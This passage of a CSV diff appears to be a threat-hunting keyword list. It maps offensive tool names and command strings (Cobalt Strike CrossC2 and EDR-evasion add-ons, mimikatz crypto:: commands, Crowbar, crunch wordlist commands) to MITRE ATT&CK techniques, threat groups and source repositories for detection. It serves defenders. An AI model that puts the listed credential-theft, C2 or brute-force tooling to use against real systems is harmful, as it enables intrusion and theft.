thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*CrossC2Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossC2MemScriptEng*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*CrossC2Script*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. 
Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","156","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z"
+"*CrossNet.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z"
+"*Cross-Site-Scripting-XSS-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
+"*CrossTenantSynchronizationBackdoor.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*crowbar*","offensive_tool_keyword","Crowbar","Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. 
to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","10","1231","324","2022-12-28T16:10:59Z","2014-09-30T07:46:23Z"
+"*CroweCybersecurity/ad-ldap-enum*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z"
+"*CRTInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*CRTInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*CRTInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*crunch * -o *.txt*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*crypt0p3g/bof-collection*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto_identifier*","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","116","26","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z" +"*cryptvortex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cs2modrewrite.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*cs2nginx.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" 
+"*csandker/Azure-AccessPermissions*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
